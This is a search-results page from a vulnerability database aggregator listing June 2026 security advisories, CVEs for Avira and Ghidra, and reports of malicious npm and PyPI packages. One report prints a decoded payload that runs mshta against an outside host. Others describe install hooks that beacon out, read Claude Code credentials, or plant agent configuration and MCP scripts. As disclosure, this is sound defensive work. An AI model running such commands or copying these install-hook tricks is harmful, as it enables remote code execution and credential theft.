Lucene search
K

7265 matches found

RedHat Linux
RedHat Linux
added 2026/06/16 10:11 a.m.8 views

Important: Red Hat Security Advisory: Assisted Installer RHEL 9 components for Multicluster Engine for Kubernetes 2.8.8

Assisted installer RHEL 9 components for the multicluster engine for Kubernetes 2.8.8 General Availability release, with updates to container images. Assisted Installer RHEL 9 integrates components for the general multicluster engine for Kubernetes 2.8.8 release that simplify the process of...

8.8CVSS6.4AI score0.00385EPSS
Exploits1References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/16 2:14 a.m.10 views

Malicious code in event-metrics-q3x7 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9b805c0ac88b45f49b1698fb9ea33e00767380544221d574a0da0e0f526d07f8 On install, package.json runs a postinstall hook node run.js that triggers beacon scripts beacon20.js, beaconlinux.js shipped in the tarball. The...

5.8AI score
Exploits0References10
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/15 9:3 p.m.12 views

Malicious code in lab-helper (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9bbde4e4075983db0c5aba255bc29f84fb2536681b13e8289412cce5c3ee7a2e On npm install, the package's postinstall hook runs seccheck.js, which enumerates the host's network interfaces and proceeds only if an IPv4 address...

5.3AI score
Exploits0References1
OSV
OSV
added 2026/06/15 5:24 p.m.6 views

MAL-2026-5824 Malicious code in testpgagent (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c3b12f57a72964e978d195ad7c3a9f6fe560ad1990d55bb1b4053d88a6bb9c4f On pip install, setup.py line 19 calls execbase64.b64decode... whose decoded body is import os; os.system'cmd /c "mshta http://fixars.top"'. This...

6.3AI score
Exploits0References6
OSV
OSV
added 2026/06/15 3:54 p.m.12 views

MAL-2026-5792 Malicious code in nativescript-swisspost-imagepicker (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b2271ce1525f722f302ee59b9de3270020e6d1aa84d74cc2972cb6ffa34d9a62 package.json declares preinstall: node index.js. On npm install, index.js reads process.env.INITCWD the installing project's working directory, takes...

5.4AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/15 3:54 p.m.10 views

Malicious code in nativescript-swisspost-imagepicker (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b2271ce1525f722f302ee59b9de3270020e6d1aa84d74cc2972cb6ffa34d9a62 package.json declares preinstall: node index.js. On npm install, index.js reads process.env.INITCWD the installing project's working directory, takes...

5.4AI score
Exploits0References1
OSV
OSV
added 2026/06/14 7:30 a.m.17 views

MAL-2026-5757 Malicious code in npm-sandbox-ping-c8f2a (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f5401a81d56283c310efebfe29af19c3e3fa331667f40adeed71a54627adc877 Package declares a postinstall hook "postinstall": "node run.js" in package.json that executes on every install. Bundled scripts beacon6.js and...

5.5AI score
Exploits0References2
NVD
NVD
added 2026/06/12 10:16 p.m.15 views

CVE-2025-7017

Heap buffer out-of-bounds read vulnerability in Avira Antivirus engine when scanning a malformed Windows MSI file may allow Local Execution of Code or Denial-of-Service of the antivirus engine process. This issue affects Avira Antivirus on Windows, macOS, and Linux for engine builds before...

7.8CVSS0.00131EPSS
Exploits0References1
CVE
CVE
added 2026/06/12 10:13 p.m.20 views

CVE-2025-7017

Affected product: Avira Antivirus engine. Vulnerability: heap buffer out-of-bounds read when scanning a malformed Windows MSI file. Root cause: out-of-bounds heap read in the engine (details not provided beyond the description). Impact: local code execution or denial-of-service of the antivirus e...

7.8CVSS5.7AI score0.00131EPSS
Exploits0References1
OSV
OSV
added 2026/06/12 9:31 p.m.14 views

MAL-2026-5719 Malicious code in ect-654321 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ec784a9a1926de8d2c18de41c996e69e10f7001bf9fdc7604edc22d5775b4540 ect-654321 contains only a package.json with a preinstall lifecycle hook that unconditionally executes wget...

5.4AI score
Exploits0References8
OSV
OSV
added 2026/06/12 8:54 p.m.10 views

MAL-2026-5716 Malicious code in beamz (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c380f1f0fc3c5cf723cd7d92bf41c30f622aafaa633a32f0a78bf91a3a769d2a The package advertises itself as a credential-transfer CLI but implements transfer by reading the user's Anthropic Claude Code credentials...

5.5AI score
Exploits0References6
OSV
OSV
added 2026/06/11 7:16 a.m.18 views

MAL-2026-5599 Malicious code in 0x2ai-ivo (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e78c039ee7ad67b1a20ef30b37ce03178f6c2181b1e330db69e04dabd0a28686 On install, the postinstall script copies the package's payload/ tree CLAUDE.md,.claude/settings.json,.mcp.json, and several.cjs MCP scripts into the...

5.5AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/11 6:49 a.m.11 views

Malicious code in sysnu (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector eac9873e59ffdf79c56fd4f9366b56e0532f87dc00c4380fae18d714785b0bc8 On require / CLI invocation, sysnu performs two install-time-equivalent actions on Windows hosts. First, if python is not on PATH, index.js lines 42-...

5.6AI score
Exploits0References2
OSV
OSV
added 2026/06/11 5:17 a.m.16 views

MAL-2026-5565 Malicious code in ai-sdk-helpers (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 501daa3c8b2c9c2609dc60fd90ae59710a603ae56fa5dcc867d24913889c5413 [email protected] is a typosquat impersonating the Vercel AI SDK ecosystem homepage ai-sdk.guide, author 'AI SDK Guide '. On npm install,...

5.9AI score
Exploits0References24
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/11 4:49 a.m.13 views

Malicious code in js-crypto-promise (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a9d677e45bee46911d04564e9260f4b569119a4ca0a13a58bcd43760359fbb4f The package's prepinstall.js script base64-decodes a hidden URL stored in a constant misleadingly named HASHKEY decoding to...

6.3AI score
Exploits0References2
NVD
NVD
added 2026/06/10 2:16 p.m.12 views

CVE-2026-52752

Ghidra before 12.0.2 contains a path traversal vulnerability in the extension installer that fails to validate ZIP entry names during extraction. Attackers can craft malicious extensions with traversal sequences like ../ in filenames to write arbitrary files outside the intended directory, enabli...

8.4CVSS0.00215EPSS
Exploits1References2
Vulnrichment
Vulnrichment
added 2026/06/10 12:39 p.m.8 views

CVE-2026-52752 Ghidra < 12.0.2 - Path Traversal in Extension Installer via ZIP Entry Names

Ghidra before 12.0.2 contains a path traversal vulnerability in the extension installer that fails to validate ZIP entry names during extraction. Attackers can craft malicious extensions with traversal sequences like ../ in filenames to write arbitrary files outside the intended directory, enabli...

8.4CVSS5.8AI score0.00215EPSS
Exploits1References2
EUVD
EUVD
added 2026/06/10 12:39 p.m.10 views

EUVD-2026-36011

Ghidra before 12.0.2 contains a path traversal vulnerability in the extension installer that fails to validate ZIP entry names during extraction. Attackers can craft malicious extensions with traversal sequences like ../ in filenames to write arbitrary files outside the intended directory, enabli...

8.4CVSS5.8AI score0.00215EPSS
Exploits1References2
Cvelist
Cvelist
added 2026/06/10 12:39 p.m.37 views

CVE-2026-52752 Ghidra < 12.0.2 - Path Traversal in Extension Installer via ZIP Entry Names

Ghidra before 12.0.2 contains a path traversal vulnerability in the extension installer that fails to validate ZIP entry names during extraction. Attackers can craft malicious extensions with traversal sequences like ../ in filenames to write arbitrary files outside the intended directory, enabli...

8.4CVSS0.00215EPSS
Exploits1References2
CVE
CVE
added 2026/06/10 12:39 p.m.66 views

CVE-2026-52752

CVE-2026-52752 affects Ghidra prior to 12.0.2. The path traversal flaw is in the extension installer and arises from insufficient validation of ZIP entry names during extraction, allowing crafted extensions with ../ sequences to write files outside the intended directory and potentially achieve c...

8.4CVSS5.8AI score0.00215EPSS
Exploits1References2Affected Software1
Rows per page
Query Builder